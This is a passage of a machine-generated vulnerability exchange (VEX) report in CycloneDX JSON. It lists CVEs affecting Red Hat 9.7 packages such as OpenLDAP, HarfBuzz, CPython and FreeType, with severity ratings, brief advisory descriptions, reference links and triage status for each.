        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        }
      ],
      "analysis": {
        "state": "in_triage",
        "justification": "",
        "response": [],
        "detail": "This CVE is under investigation by Confluent."
      }
    },
    {
      "id": "CVE-2026-22185",
      "ratings": [
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.8,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        125,
        191
      ],
      "description": "OpenLDAP Lightning Memory-Mapped Database (LMDB) versions up to and including 0.9.14, prior to commit 8e1fda8, contain a heap buffer underflow in the readline() function of mdb_load. When processing malformed input containing an embedded NUL byte, an unsigned offset calculation can underflow and cause an out-of-bounds read of one byte before the allocated heap buffer. This can cause mdb_load to crash, leading to a limited denial-of-service condition.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-22185"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-22185"
        },
        {
          "url": "https://bugs.openldap.org/show_bug.cgi?id=10421"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22185"
        },
        {
          "url": "https://seclists.org/fulldisclosure/2026/Jan/5"
        },
        {
          "url": "https://seclists.org/fulldisclosure/2026/Jan/8"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-22185"
        },
        {
          "url": "https://www.openldap.org/"
        },
        {
          "url": "https://www.vulncheck.com/advisories/openldap-lmdb-mdb-load-heap-buffer-underflow-in-readline"
        }
      ],
      "published": "2026-01-07T21:16:01+00:00",
      "updated": "2026-04-15T00:35:42+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/openldap@2.6.8-4.el9?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "2.6.8-4.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/openldap@2.6.8-4.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/openldap@2.6.8-4.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/openldap@2.6.8-4.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/openldap@2.6.8-4.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/openldap@2.6.8-4.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/openldap@2.6.8-4.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/openldap@2.6.8-4.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/openldap@2.6.8-4.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/openldap@2.6.8-4.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/openldap@2.6.8-4.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/openldap@2.6.8-4.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/openldap@2.6.8-4.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/openldap@2.6.8-4.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/openldap@2.6.8-4.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/openldap@2.6.8-4.el9?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-22693",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        476
      ],
      "description": "HarfBuzz is a text shaping engine. Prior to version 12.3.0, a null pointer dereference vulnerability exists in the SubtableUnicodesCache::create function located in src/hb-ot-cmap-table.hh. The function fails to check if hb_malloc returns NULL before using placement new to construct an object at the returned pointer address. When hb_malloc fails to allocate memory (which can occur in low-memory conditions or when using custom allocators that simulate allocation failures), it returns NULL. The code then attempts to call the constructor on this null pointer using placement new syntax, resulting in undefined behavior and a Segmentation Fault. This issue has been patched in version 12.3.0.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-22693"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/01/11/1"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/01/12/1"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-22693"
        },
        {
          "url": "https://github.com/harfbuzz/harfbuzz/commit/1265ff8d990284f04d8768f35b0e20ae5f60daae"
        },
        {
          "url": "https://github.com/harfbuzz/harfbuzz/security/advisories/GHSA-xvjr-f2r9-c7ww"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22693"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-22693"
        }
      ],
      "published": "2026-01-10T06:15:52+00:00",
      "updated": "2026-02-18T17:49:22+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/harfbuzz@2.7.4-10.el9?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "2.7.4-10.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/harfbuzz@2.7.4-10.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/harfbuzz@2.7.4-10.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/harfbuzz@2.7.4-10.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/harfbuzz@2.7.4-10.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/harfbuzz@2.7.4-10.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/harfbuzz@2.7.4-10.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/harfbuzz@2.7.4-10.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/harfbuzz@2.7.4-10.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/harfbuzz@2.7.4-10.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/harfbuzz@2.7.4-10.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/harfbuzz@2.7.4-10.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/harfbuzz@2.7.4-10.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/harfbuzz@2.7.4-10.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/harfbuzz@2.7.4-10.el9?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-2297",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.3,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        668
      ],
      "description": "The import hook in CPython that handles legacy *.pyc files (SourcelessFileLoader) is incorrectly handled in FileLoader (a base class) and so does not use io.open_code() to read the .pyc files. sys.audit handlers for this audit event therefore do not fire.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-2297"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/03/05/6"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:10950"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-2297"
        },
        {
          "url": "https://bugzilla.redhat.com/2395108"
        },
        {
          "url": "https://bugzilla.redhat.com/2408891"
        },
        {
          "url": "https://bugzilla.redhat.com/2418084"
        },
        {
          "url": "https://bugzilla.redhat.com/2431366"
        },
        {
          "url": "https://bugzilla.redhat.com/2431374"
        },
        {
          "url": "https://bugzilla.redhat.com/2444691"
        },
        {
          "url": "https://bugzilla.redhat.com/2448168"
        },
        {
          "url": "https://bugzilla.redhat.com/2448181"
        },
        {
          "url": "https://bugzilla.redhat.com/2457409"
        },
        {
          "url": "https://bugzilla.redhat.com/2457932"
        },
        {
          "url": "https://bugzilla.redhat.com/2458049"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2395108"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2408891"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2418084"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431366"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431374"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2444691"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448168"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448181"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457409"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457932"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2458049"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-13837"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15282"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-59375"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-6075"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0672"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1502"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-2297"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-3644"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4224"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4786"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-6100"
        },
        {
          "url": "https://errata.almalinux.org/8/ALSA-2026-10950.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:10950"
        },
        {
          "url": "https://github.com/python/cpython/commit/482d6f8bdba9da3725d272e8bb4a2d25fb6a603e"
        },
        {
          "url": "https://github.com/python/cpython/commit/69ddd9bb2cc4bd69b1565647c18659c6a789ccd9"
        },
        {
          "url": "https://github.com/python/cpython/commit/876858c9f65d9ab656c7fa639f268ce7856d89dd"
        },
        {
          "url": "https://github.com/python/cpython/commit/a51b1b512de1d56b3714b65628a2eae2b07e535e"
        },
        {
          "url": "https://github.com/python/cpython/commit/e58e9802b9bec5cdbf48fc9bf1da5f4fda482e86"
        },
        {
          "url": "https://github.com/python/cpython/issues/145506"
        },
        {
          "url": "https://github.com/python/cpython/pull/145507"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-2297.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-10950.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2297"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-2297"
        }
      ],
      "published": "2026-03-04T23:16:10+00:00",
      "updated": "2026-05-01T16:16:30+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7",
          "versions": [
            {
              "version": "3.9.25-3.el9_7.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "3.9.25-3.el9_7.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "3.9.25-3.el9_7.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-23865",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "bitnami"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 4.6,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L/E:U/RL:O/RC:C"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        125
      ],
      "description": "An integer overflow in the tt_var_load_item_variation_store function of the Freetype library in versions 2.13.2 and 2.13.3 may allow for an out of bounds read operation when parsing HVAR/VVAR/MVAR tables in OpenType variable fonts. This issue is fixed in version 2.14.2.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-23865"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/03/03/8"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:9693"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-23865"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2443891"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460038"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460039"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460040"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460041"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460042"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460043"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460044"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22007"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22013"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22016"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22018"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22021"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-23865"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34268"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34282"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-9693.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:9689"
        },
        {
          "url": "https://github.com/advisories/GHSA-878v-mxg6-vj8f"
        },
        {
          "url": "https://gitlab.com/freetype/freetype/-/commit/fc85a255849229c024c8e65f536fe1875d84841c"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-23865.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-9693.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23865"
        },
        {
          "url": "https://sourceforge.net/projects/freetype/files/freetype2/2.14.2"
        },
        {
          "url": "https://sourceforge.net/projects/freetype/files/freetype2/2.14.2/"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8086-1"
        },
